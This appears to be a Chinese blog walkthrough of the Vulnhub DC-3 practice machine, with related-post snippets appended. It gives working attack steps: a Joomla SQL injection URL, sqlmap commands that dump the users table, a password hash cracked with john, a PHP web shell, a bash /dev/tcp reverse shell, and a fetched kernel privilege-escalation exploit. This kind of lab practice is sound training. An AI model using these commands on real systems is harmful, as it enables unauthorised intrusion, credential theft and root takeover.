Vulnhub靶机:DC-3渗透详细过程

已于 2024-04-11 11:04:37 修改
阅读量923 收藏 13
点赞数 6
文章标签: web安全 网络安全 linux
于 2024-04-11 10:57:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/timeless_cz/article/details/137593565
版权

 靶机下载地址放在文章最后啦

一、靶机的搭建

1.打开文件夹右击使用VM虚拟机打开

2.给虚拟机取个名字(我这里就直接DC-3),选择自己虚拟机存放的位置

3.等待虚拟机的导入

4.直接打开发现报错,编辑一下虚拟机发现还是报错,这是因为我使用的17版本的需要改一下兼容性(虚拟机可能会闪退)。

5.先改兼容性再解决启动问题,选择兼容16版本的就可以了。

6.再编辑虚拟机,解决启动问题。

7.成功启动并进入靶场的登录界面(不知道密码和账号),IP也不知道是好多。

二、渗透过程

1.直接上nmap扫一下存活的IP地址

我这里IP地址有点多,13这台机子应该就是DC-3靶机IP了

nmap -sn 10.189.100.10-20

2.再用nmap扫一下开放的端口

nmap -sV -A -p- 10.189.160.13

3.发现只开放了 80端口,先访问80端口看看

4.我们使用whatweb看看网站的指纹信息,发现是Joomla框架。

whatweb -v 10.189.160.13

5.dirsearch扫一下网站目录,发现了后天登陆地址

dirsearch -u "http://10.189.160.13/"

6.访问后台登陆地址看看

7.百度一下Joomla框架有什么漏洞

8.百度里发现一篇文章,里面的SQL注入可以利用。

文章地址:https://www.cnblogs.com/arrest/articles/17660026.html

9.检查是否存在SQL注入

http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))

10.直接上SQLmap,先爆出数据库。有选项就按Y(不要使用-- batch),耐心多等一会就爆出来了

 sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs

11.发现了joomladb数据库,我们再爆一下joomladb里面的表。有选项就按Y

sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs -D joomladb --tables

12.我们继续爆表里面的字段,一路按Y,最后按1默认字典,拉一下窗口看着舒服一些。

sqlmap -u "http://10.189.160.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,user()),0x7e)Joomla/index.php?" --dbs -D joomladb --tables -T "#__users" --dump

13.我们发现用户名是:admin 密码是加密的,使用kali中的john工具破解密码

 admin $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

14.先使用vi编辑器把密码放在TXT文本里面,在使用john进行破解

vi passwd.txt

john passwd.txt

15.密码就是shoopy,我们登陆一下后台

16.发现一个地方可以上传webshell

17.创建一个shell.php的文件,直接写入一句话

18.使用蚁剑直接连接

http://10.189.160.13/templates/beez3/html/shell.php

19.使用whoami命令查看用户权限是www-data,我们需要提权

20.我们先反弹一下shell,在我们的shell.php插入

<?php
system ("bash -c 'bash -i  >& /dev/tcp/10.189.160.1/6666  0>&1'");
?>

21.访问shell.php并在kali上面使用nc监听,再使用python反弹成交互式shell

http://10.189.160.13/templates/beez3/html/shell.php
nc -l -p 6666

22.尝试了SUID和GIT提权都没有成功,看看系统版本是多少

cat /etc/issue

23.使用searchsploit搜索工具看看有什么可以利用的漏洞,发现一个提权漏洞

searchsploit Ubuntu 16.04

24.我们 具体查看一下漏洞

searchsploit -p linux/local/39772.txt

26.可以使用溢出提权,并且告诉我们了工具的下载地址

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

27.直接使用命令把工具下载到靶机中,并解压

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

28.进入解压后的39772目录,发现两个压缩包

28.使用命令直接解压exploit.tar

tar -xvf exploit.tar

29.安装文本中的提示进行提权操作

cd ebpf_mapfd_doubleput_exploit
ls 
./compile.sh
./doubleput.c

30.成功拿到唯一的flag了

记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我

后台回复"DC-3"即可获得靶场地址

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

菜鸟学渗透
关注
vulnhub系列靶机--DC3
cyzCc的博客
02-23 533
vulnhub系列靶机DC3 主机发现: 先主机发现找到靶机的ip 使用nmap nmap -sP 192.168.211.0/24 netdiscover -r 192.168.211.1/24 根据MAC地址可以确定靶机的ip为192.168.211.136 然后扫描该ip所开放的端口服务 nmap -A 192.168.211.136 -p 1-65535 发现靶机只开放了80端口,访...
vulnhub靶场之DC-3
qq_58091216的博客
01-08 1402
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
渗透测试】——VulnHub靶机渗透实战 | HA:Joker
最新发布
HinsCoder的博客
09-17 1904
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场。本文将从环境搭建、端口扫描、目录扫描到信息提取和突破8080端口,尽可能排除新版本遇到的环境Bug,详解介绍渗透测试全过程。如果你是新手小白,本文将带你一窥渗透测试的世界。
Vulnhub DC-3
Pai_Space
02-15 274
192.168.37.132 This time, there is only one flag, one entry point and no clues. To get the flag, you'll obviously have to gain root privileges. How you get to be root is up to you - and, obviously, the system. Good luck - and I hope you enjo...
VulnHub DC3
baynk的博客
05-16 305
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
vulnhub-DC3
weixin_55129870的博客
05-15 532
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3712
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-9渗透详细过程DC系列完结)
IerkeU的博客
03-28 3826
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 2000
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2836
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
VulnHubDC-3
qq_45434762的博客
03-23 533
一个粗糙的信息收集通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb扫...
vulnhubdc3
qq_54030686的博客
06-08 307
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 419
扫描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也扫了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan扫一下啊 没事就扫一扫,扫扫更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
vulnhub靶机dc-3
m0_52328368的博客
08-14 1355
dc-3靶机教程
Vulnhub靶机DC3
qq_48904485的博客
02-14 710
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机DC3(10.0.2.56)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/
vulnhub靶机试炼场之DC-3
Mrs_H的博客
01-05 2484
DC-3靶机渗透实战 一.前言 关于这次的靶机渗透文章我已经托更很久了,一直都没有时间来好好看一下这个靶机。最近也是到了放假的时候,也会陆续的把之前期末复习期间欠下的东西好好回顾一下。在上个月里也没有好好的看过靶场里面的题目,这个月打算趁年前把ssrf的坑填了,顺便也想把文件上传这方面的靶场习题开个坑,以前只有在打比赛的时候才会着重看的漏洞就是文件上传,关于其中的奇技淫巧还有着太多不熟悉的地方,有时间要好好看一下了。 二.正文 这次的靶机只有一个flag所以这次就不以flag的先后顺序做时间线了,就以渗透
Vulnhub系列】DC3
大方子
04-08 5107
文章目录基本信息实验过程额外补充利用php反弹shell使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip 基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp-scan --interface eth0 192.168.61.1/24 这里可以直接看出DC3的IP地址为192.1
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3443
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
VulnHub入门教程:DC-1靶场攻破指南
在进行渗透测试的过程中,DC-1 靶场提供了一个安全的学习环境,允许初学者在不造成实际损害的情况下实践和提升技能。这个靶场设计为对初学者具有挑战性,但难度程度将取决于你的技能、知识和学习能力。为了成功完成...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值